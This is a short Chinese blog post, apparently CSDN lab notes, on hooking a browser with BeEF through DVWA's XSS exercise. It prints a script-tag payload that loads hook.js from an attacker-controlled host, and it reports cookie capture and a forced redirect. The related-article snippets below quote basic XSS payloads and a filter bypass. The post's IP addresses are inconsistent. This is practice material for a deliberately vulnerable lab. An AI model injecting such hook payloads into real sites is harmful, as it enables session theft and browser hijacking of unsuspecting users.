在dvwa的xss中使用beef

最新推荐文章于 2024-02-04 09:45:26 发布
最新推荐文章于 2024-02-04 09:45:26 发布
阅读量655 收藏 2
点赞数
分类专栏: DVWA靶场-实验笔记
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/112767790
版权

在dvwa的xss中使用beef
kali ip为192.168.253.8,在kali里启动beef
在这里插入图片描述
在自动跳转出的登录页面登录beef,用户名密码都是beef
在这里插入图片描述
在这里插入图片描述
在受害机,192.168.253.8,进行xss,其中<script src=http://192.168.253.132:3000/hook.js>,点击提交
在这里插入图片描述
好了,beef里可以看见192.168.253.8上线了,获取了cookie,
在这里插入图片描述
在这里插入图片描述
上线后就出现很多可以利用的模块了,我们试试重定向
在这里插入图片描述
发现192.168.253.8的dvwa xss界面,已经跳转成了我指定的一个小说网站
在这里插入图片描述

Alsn86
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA系列——XSS(跨站脚本注入(反射型,储存型,DOM))
weixin_49340699的博客
12-15 2410
DVWA系列——XSS(跨站脚本注入)简介low级别反射型xss源码分析储存型xss源码分析DOM型xss源码分析medium级别反射型xss源码分析破解思路储存型xssDOM型xss源码分析high级别反射型xss储存型xssDOM型xss 简介 XSS全称Cross Site Scripting,即跨站脚本攻击,从某种意义上来说也是一种注入攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面,恶意代码就会在浏览器页面执行,xss不限于javascript,还包括flash等其他脚本语言,根据代
xss漏洞以及beef使用
young‘s blog
07-20 3078
这次的xss漏洞就从dvwa开始吧。 反射型: 先是low级别的,输入1后页面变为 这次尝试一下burpsuite里自带的扫描器。 首先不得不说dvwa设计有一些缺陷,有时候等级改不过去,这就让人很蛋疼,所以还是要自己手动改一下。就因为这个,扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图 可以看到箭头指向的就是payload 看一下返回页面,就是弹框1了。没啥别的。 抓一下返回包看一看 可...
DVWA-XSS
qq_58091216的博客
04-19 5612
一.DOM型xss 1.low (1)我们知道最基础的xss攻击就是<script>alert(/xss/)</script> (2)我们看到english直接按select,可以看到?default=English,我们知道在?default后面进行xss攻击 (3)我们直接输入<script>alert(/xss/)</script>,可以看到弹窗 (4)因为low比较简单所以我把分析源代码放在了最后。可以看到没有如何防御 2.m.
dvwaxss(跨站脚本)攻击
无痕的博客
01-17 2247
xss攻击介绍与在dvwaxss攻击演示
DVWAXSS (完整版)
一期一会的博客
03-30 5286
xss DOM型xss
dvwa———xss(全)
GZY0601的博客
09-28 2355
这个章节我们来讲一下xss攻击XSS 又称CSS(Cross Site Scripting)或跨站脚本攻击,攻击者在网页插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。xss有三种:反射型(Reflected),存储型(Stored)和DOM型反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库)存储型XSS:将用户输入的数据存储在服务器端。
DVWA测试XSS跨站脚本攻击三种类型
WINDY_PACE的博客
05-04 1784
测试XSS三种类型危害最大的存储型如何无声息钓鱼获取到用户信息
XSS自动化工具——Beef
世间繁华梦一出
03-10 5527
Beef使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef使用五、Beef的主要功能 在我的记忆之之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
DVWAXSS跨站脚本攻击
sunshine1_0的博客
04-17 665
XSS跨站脚本攻击
beef-xss软件使用教程
weixin_44717303的博客
05-24 781
beef-xss教程实验环境打开beefxss登录 dvwa难度调到low 实验环境 beef-xss+kali2021 打开beefxss 打开对应的网址并登录 http://192.168.2.157:3000/ui/panel 然后我们回到虚拟机找到hook地址 登录 dvwa难度调到low
DVWA下的XSS
07-25
DVWA下的XSS
DVWA学习之XSS
千寻的博客
01-02 489
DVWA学习之XSS 反射性XSS Low等级 【】 Medium等级 双写绕过: 【<scr 大小写绕过 【】 High等级 【] []当点击键盘任意一个按键的时候触发。 Impossible等级 存储型XSS Low等级 trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参...
DVWA------XSS(全)
m0_65712192的博客
12-13 5286
DVWA-----XSS(全)
DVWA学习之XSS(跨站脚本攻击)
最新发布
mmxhappy的专栏
02-04 988
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击!
DVWA —— XSS分析
weixin_30867015的博客
11-15 147
反射型 LOW 源码: 对输入没有任何过滤 <script>alert('xss')</script> 弹窗成功 Medium 源码: 过滤掉了<script>,将其变为空 可以双写绕过 <sc<script>ipt>alert('xss')</script> 成功弹窗 ...
DVWA靶场系列(六)—— XSS(跨站脚本攻击)
qq_45612828的博客
08-02 2659
DVWA靶场系列(六)—— XSS(跨站脚本攻击)
DVWA--XSS详解
洋洋的小黑屋
12-29 8642
DVWAXSS详解 XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS三种: 反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 存储型XSS:将用户输入的数据存储在服务器端。用户访问了带有xss得页面代码后,产生安全问题。 DOM XSS:通过修改页面的D...
DVWA-XSS 学习笔记
weixin_42739903的博客
12-10 413
一、DVWA-XSS XSS 简单介绍 XSS攻击也叫跨站脚本攻击(Cross Site Scripting)原本应当是CSS,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,通常将其缩写成XSS,它是一种经常出现在Web应用的网络安全漏洞。 XSS某种意义上也是一种注入攻击,黑客通过前端网页向受害者浏览的网页注入 js 脚本,从而实现攻击目的。 与其它Web漏洞不同,XSS并非直接攻击服务器,而是攻击的受害者的浏览器。 需要强调的是,XSS不仅仅限于JavaScri
XSS-DVWA学习及JS脚本和BeEFXU学习
m0_62636343的博客
09-22 491
XSS-DVWA学习及JS脚本和BeEFXU学习
dvwa xss restore
08-12
对于DVWA(Damn Vulnerable Web Application)XSS(跨站脚本攻击)漏洞的修复,您可以按照以下步骤进行操作: 1. 确保您已经安装了DVWA并启动了相应的服务器。 2. 登录到DVWA应用程序,并导航到XSS攻击页面。 3. 在XSS攻击页面,输入一些恶意的脚本代码来触发XSS漏洞。 4. 检查并确认XSS漏洞已经成功触发。 5. 打开DVWA的源代码文件,并找到与XSS漏洞相关的代码段。 6. 修复XSS漏洞的方法通常是对用户输入进行适当的验证和过滤。您可以使用安全编码方法(如HTML编码或转义字符)来防止恶意脚本的执行。 7. 在修复代码后,保存并重新部署DVWA应用程序。 8. 再次登录到DVWA,并返回到XSS攻击页面。 9. 输入先前用于触发XSS漏洞的恶意脚本代码,以验证修复是否成功。 10. 如果成功修复,您将看到脚本不再执行,或者以安全的方式进行处理。 请注意,这是一个基本的修复过程,并且具体的步骤可能因DVWA的版本和配置而有所不同。在进行任何安全性修复之前,请确保您了解DVWAXSS漏洞的工作原理,并根据您的具体情况进行相应的操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值